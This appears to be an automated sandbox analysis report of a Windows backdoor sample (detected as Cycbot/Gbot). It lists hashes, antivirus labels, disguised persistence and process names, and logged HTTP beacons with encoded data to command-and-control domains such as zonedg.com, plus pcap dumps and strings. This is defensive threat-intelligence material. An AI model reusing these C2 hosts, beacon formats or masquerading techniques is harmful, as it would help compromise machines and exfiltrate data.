Analysis Date2015-05-06 22:04:20
MD528830997689e179c7986751388a48eca
SHA1792a8f8814d93d68c8d9da592e0e52b17a56bc2a

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: df9c7ce8c21307bce4e7f4391838287d sha1: 59cc710317030d1f64cc4aff94828941e64e2984 size: 115200
Section.rdata md5: 9d1a4e0207520d1702b5257a9403d1a1 sha1: 765b9fe0226f3e78cdc220defc1e0a21b52fa892 size: 1536
Section.data md5: 82de2a5dd53d40c68ebf694b1072b2b8 sha1: b2ab08054c534c2d0f72cf26b30c715f5ebbb6e6 size: 66560
Section.reloc md5: 04cf75f76c194f4745ed536dc48a66f5 sha1: bfd9ca5d08059d3bc7d199203de610adc51debbe size: 1024
Timestamp2005-09-06 08:29:55
PEhash8a88ad475eb9a6a1adebdbc7151ba7f4e7e3b7fe
IMPhashac0aacff876467a77465f0178196b8cc
AVAd-AwareGen:Variant.Kazy.38355
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Variant.Kazy.38355
AVAuthentiumW32/Goolbot.M.gen!Eldorado
AVAvira (antivir)TR/Crypt.ZPACK.Gen
AVBitDefenderGen:Variant.Kazy.38355
AVBullGuardGen:Variant.Kazy.38355
AVCA (E-Trust Ino)Win32/Cycbot.G!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVno_virus
AVDr. WebBackDoor.Gbot.73
AVEmsisoftGen:Variant.Kazy.38355
AVEset (nod32)Win32/Kryptik.TNG
AVFortinetW32/Jorik_Gbot.EBE!tr
AVFrisk (f-prot)W32/Goolbot.M.gen!Eldorado
AVF-SecureGen:Variant.Kazy.38355
AVGrisoft (avg)Win32/Cryptor
AVIkarusVirus.Win32.Cryptor
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.r
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.B
AVMicroWorld (escan)Gen:Variant.Kazy.38355
AVPadvishno_virus
AVRisingno_virus
AVSophosMal/Agent-AEO
AVSymantecBackdoor.Cycbot!gen7
AVTrend MicroBKDR_CYCBOT.SME3
AVTwisterBackdoor.B9EE38EA15B088BE
AVVirusBlokAda (vba32)Backdoor.Gbot

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{6988405C-71C3-427c-975A-0398706E79EE}
Winsock DNSresetmymemory.com
Winsock DNS127.0.0.1
Winsock DNSfastblogportal.com
Winsock DNSnationsautoelectric.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSnationsautoelectric.com
Type: A
98.139.135.198
DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSresetmymemory.com
Type: A
192.155.89.148
DNSworldmotoblo.com
Type: A
DNSfastblogportal.com
Type: A
HTTP GEThttp://nationsautoelectric.com/images/50-217-1_F_2_.jpg?v93=83&tq=gJ4WK%2FSUh7TFhRMw9YLJuMSTUivqg4a0xZNTK%2B%2FbxWq1SfkIYUBM
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP GEThttp://resetmymemory.com/blog/images/3521.jpg?v61=97&tq=gKZEtzyMv5rJqxG1J42pzMffBvwr1%2BjbwvgS917W65rJqlLfgPiWW1cg
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8CiYvEaSvT%2Bsqpi8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 98.139.135.198:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 192.155.89.148:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1038 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1039 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1040 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 35302d32   GET /images/50-2
0x00000010 (00016)   31372d31 5f465f32 5f2e6a70 673f7639   17-1_F_2_.jpg?v9
0x00000020 (00032)   333d3833 2674713d 674a3457 4b253246   3=83&tq=gJ4WK%2F
0x00000030 (00048)   53556837 54466852 4d773959 4c4a754d   SUh7TFhRMw9YLJuM
0x00000040 (00064)   53545569 76716734 6130785a 4e544b25   STUivqg4a0xZNTK%
0x00000050 (00080)   32422532 46627857 71315366 6b495955   2B%2FbxWq1SfkIYU
0x00000060 (00096)   424d2048 5454502f 312e300d 0a436f6e   BM HTTP/1.0..Con
0x00000070 (00112)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000080 (00128)   486f7374 3a206e61 74696f6e 73617574   Host: nationsaut
0x00000090 (00144)   6f656c65 63747269 632e636f 6d0d0a41   oelectric.com..A
0x000000a0 (00160)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000000b0 (00176)   2d416765 6e743a20 6d6f7a69 6c6c612f   -Agent: mozilla/
0x000000c0 (00192)   322e300d 0a0d0a                       2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 796a5976 45615325   OQij%2B8yjYvEaS%
0x000000c0 (00192)   32465425 32427371 74537225 32466525   2FT%2BsqtSr%2Fe%
0x000000d0 (00208)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000e0 (00224)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000f0 (00240)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x00000100 (00256)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x00000110 (00272)   2e300d0a 436f6e74 656e742d 4c656e67   .0..Content-Leng
0x00000120 (00288)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000130 (00304)   6e3a2063 6c6f7365 0d0a0d0a            n: close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 4f6f5976 45615350   OQij%2B8OoYvEaSP
0x000000c0 (00192)   54253242 73717053 72253246 65253242   T%2BsqpSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a7563 68206669    close....uch fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f333532 312e6a70 673f7636 313d3937   /3521.jpg?v61=97
0x00000020 (00032)   2674713d 674b5a45 747a794d 7635724a   &tq=gKZEtzyMv5rJ
0x00000030 (00048)   71784731 4a343270 7a4d6666 42767772   qxG1J42pzMffBvwr
0x00000040 (00064)   31253242 6a627776 67533931 37573635   1%2BjbwvgS917W65
0x00000050 (00080)   724a716c 4c666750 69575731 63672048   rJqlLfgPiWW1cg H
0x00000060 (00096)   5454502f 312e300d 0a436f6e 6e656374   TTP/1.0..Connect
0x00000070 (00112)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000080 (00128)   3a207265 7365746d 796d656d 6f72792e   : resetmymemory.
0x00000090 (00144)   636f6d0d 0a416363 6570743a 202a2f2a   com..Accept: */*
0x000000a0 (00160)   0d0a5573 65722d41 67656e74 3a206d6f   ..User-Agent: mo
0x000000b0 (00176)   7a696c6c 612f322e 300d0a0d 0a210a20   zilla/2.0....!. 
0x000000c0 (00192)   2020203c 2f746974 6c653e0a 20203c2f      </title>.  </
0x000000d0 (00208)   68656164 3e0a2020 3c626f64 793e0a20   head>.  <body>. 
0x000000e0 (00224)   2020203c 68333e54 68697320 69732074      <h3>This is t
0x000000f0 (00240)   68652072 65616c2d 6d6f6465 20746573   he real-mode tes
0x00000100 (00256)   74207061 67652e2e 2e3c2f68 333e0a09   t page...</h3>..
0x00000110 (00272)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000120 (00288)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a 0d0a0d0a            </html>.....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 796a5976 45615350   OQij%2B8yjYvEaSP
0x000000c0 (00192)   54253242 73717453 72253246 65253242   T%2BsqtSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a0d0a             close......

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 4f6f5976 45615350   OQij%2B8OoYvEaSP
0x000000c0 (00192)   54253242 73716c53 72253246 65253242   T%2BsqlSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a7563 68206669    close....uch fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 79765571 25324633   OQij%2B8yvUq%2F3
0x000000c0 (00192)   766c6557 626b5925 33442048 5454502f   vleWbkY%3D HTTP/
0x000000d0 (00208)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000e0 (00224)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x000000f0 (00240)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000100 (00256)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000110 (00272)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000120 (00288)   6c6f7365 0d0a0d0a 3c2f626f 64793e0a   lose....</body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a 0d0a0d0a            </html>.....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 32755976 45615350   OQij%2B82uYvEaSP
0x000000c0 (00192)   54253242 73717053 72253246 65253242   T%2BsqpSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a7563 68206669    close....uch fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 43695976 45615376   OQij%2B8CiYvEaSv
0x000000c0 (00192)   54253242 73717069 3852704c 36666853   T%2Bsqpi8RpL6fhS
0x000000d0 (00208)   72253246 65253242 56355a75 52672533   r%2Fe%2BV5ZuRg%3
0x000000e0 (00224)   44253344 20485454 502f312e 310d0a48   D%3D HTTP/1.1..H
0x000000f0 (00240)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x00000100 (00256)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000110 (00272)   696c6c61 2f322e30 0d0a436f 6e74656e   illa/2.0..Conten
0x00000120 (00288)   742d4c65 6e677468 3a20300d 0a436f6e   t-Length: 0..Con
0x00000130 (00304)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000140 (00320)   0d0a                                  ..


Strings
.`
.
.
.W
..P
 .
$...V.@>
.
..
.qv.
h
080904b0
1.0.0.1
1813
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
``````````
~~~~~~~~~~~~~~
>>>>>>>>>>>>>
||||||||
||||||||||
        
                             
-----\\
--::::::
-++++++++++
,,,,,,,,
::::::::
::::::::::::::::::
!!!!!!!!!!
!!!!!!!!!!!
???;;;;;;
?????????
??????????????
?}& `,@@
////////
////////////////
........
)))))))
))))))))))))))))))))))
[[[[[[[
]]]]]]]]]
}}}}}}}}}}}}}}}
@ "@ &``	
@ {$`@
@@@@@@@@@@@
@@@@@@@@@@@@@@@
*`@>>-;
\\									
&&&""""""
++++++++++
							
								
0000000000000
00000000000000000000''''''
0A<6IKMP
0U:o*@
11IIII
\1C4fV8k
#1HKA$
2,` \,
2222222
@^2*@@5v
28uS7*
2_f^?!
2".TgT$g
"??????????????????33
3333333
3333333333
33333333336666||
.....444????
44444444444;;;;;;;;;;;;;;
444444444444
@ 4j(  
 @+4OXn
!4Q01Yo
)4R^~g	jE
4=VLmDl
@`4!>W
* `5  
50'4Xm
55555555
555555555
555555555555
555|HHH
@ 5aJ~
```````````66666//////
666666
6666666
!66666666
6666666666
69_G~Hen
\[6Ef.@ 
\6i)(o
*@ 6xR
}6z$@@8
70QY)I
777777
77777777
77aaaa
7A$   `
7#MNLG
7?[OPoM
7z3{VF0
@`  `8
82-o{G
8888888888
`;8)ea
@* `8i+
@@8MBY
96"FXB
9999EE
9#, `aak
9G{vt6
9SXI#L
@`	9z3S
, `9ZA
9>zTh-
A*a7~J
AAA________
AAAAAA
>>aaaaaaaaaaaa
AAAAAAAAAAAA
aaaaaaaaaaaaaaaaaaa
*-ai}1J
aIE7-*5
anESy4>)
Apq	p5
aq0-4|
~a!?u6T
aYQi*` +
&b7.V>9j
bb444444444444444444
/////BBBB
bbbbbb
bbbbbbbbbbbbbbbbbbbYYYYYYYYYY]]]~
be^XrG
BJUc6$
BkTDz"
bO!DGS
bUVYf9
B$` y2-}
BZ9#S3B
]c0*]}v
, `?c2\
C5fBs&
c,``@6
:`C?8/
cccccccccccYYYYYYYYYYYYYYYYYY>>>>>>>>>>>>>>>HHHH%%%%%%%%%%%%%%%~~~~~~~VVVQQQQTTTTTTT
ceO9W<
CharNextA
CheckDlgButton
c$@ hrO\	
)_CmNyZ
CoCreateInstance
CoTaskMemAlloc
CoTaskMemFree
CoTaskMemRealloc
$CqzE,
CreateDialogParamA
cu/"mu@
cu+$mu
@.data
DDDDDD
ddddddd&&&&&&&&&&&&&
DDDDDDDDD
DDDDDDDWWWWWWWWW
DestroyWindow
d/G.@ 
$_d	htkDz
Djw>+" @
%d,KTD
d]&`@oH
`DPpj2
DSTH}.
D}#u+E!
DxtTRt
Dy0(``
EEEEEEE
EEEEEEEEEE
eeeeeeeeeee
EEEEEXEEEE
 @[=?eF
e~GU96
EnableWindow
,eP4P~x
EPU8]@
EQoRbh
ER^'t*
ExitProcess
`E"`@Y\
f12S@@
)F]c5	
fcaqL.
FFFFFFFFF
"FFFFFFH77777777777777777777777777<
FlushInstructionCache
FOjU,@
FP`koG`
F\& `~Z
 ,@@G 
>G4JA]
@Ga7#)tu*
G'ao|g
``GEJrL
GetCommandLineA
GetDialogBaseUnits
GetDlgItem
GetDlgItemTextA
GetProcAddress
GetSystemInfo
